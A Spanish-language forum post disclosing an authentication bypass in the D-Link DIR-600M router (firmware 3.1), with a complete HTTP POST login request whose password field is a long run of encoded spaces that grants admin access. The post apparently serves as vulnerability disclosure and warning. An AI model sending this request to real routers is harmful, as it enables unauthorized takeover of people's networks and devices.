El libre pensamiento para un internet libre
No estas registrado.
El D-Link DIR600M es un router que es compatible con el modo "repetidor WiFi"
Es un router b/g/n MIMO 1T1R (una antena, hasta 150Mbps) que tiene un punto a su favor:
Lleva una antena externa de 5dBi y la antena es desmontable.
A pesar de no ser de ultima generación es un modelo interesante: Se puede emplear como repetidor y se puede equipar con una antena de alta ganancia.
D-Link lo sigue produciendo y soportando.
Desgraciadamente tiene un grave fallo a la hora de comprobar la validez de las contraseñas entradas por los usuarios cuando intentan acceder a la interfaz de configuración.
El fallo afecta la cuenta de administrador: ¡Peligro máximo!
Si por desgracia el acceso remoto está habilitado se puede estar seguro de que el router ya forma parte un botnet barato...
Para saltarse los credenciales de un DIR-600M debemos entrar veinte (o más) espacios como contraseña para "root".
¡Le damos a <Enter> y listo!
Demostración:
La petición maligna tiene esta pinta:
POST /login.cgi HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/login.htm
Cookie: SessionID=
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
username=Admin&password=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&submit.htm%3Flogin.htm=Send
La brecha ha sido comprobada en la versión 3.1 del firmware de este dispositivo.
No podemos descartar que más dispositivos "D-Link DIR" estén afectados.
Créditos brecha y fuente
Desconectado
Tema | Respuestas | Vistas | Ultimo mensaje |
---|---|---|---|
0 | 17 | Ayer 17:45:31 por kcdtv | |
Pegado: |
414 | 40460 | Ayer 14:59:09 por kcdtv |
8 | 5866 | Ayer 14:19:11 por kcdtv | |
5 | 409 | 20-01-2021 01:19:58 por troh | |
Buscando un gestionar de contrasena por Koala
|
2 | 135 | 19-01-2021 17:45:22 por Koala |
Ultimo usuario registrado: Keko08
Usuarios registrados conectados: 0
Invitados conectados: 13
Número total de usuarios registrados: 2,091
Número total de temas: 1,493
Número total de mensajes: 14,589
Atom tema feed - Impulsado por FluxBB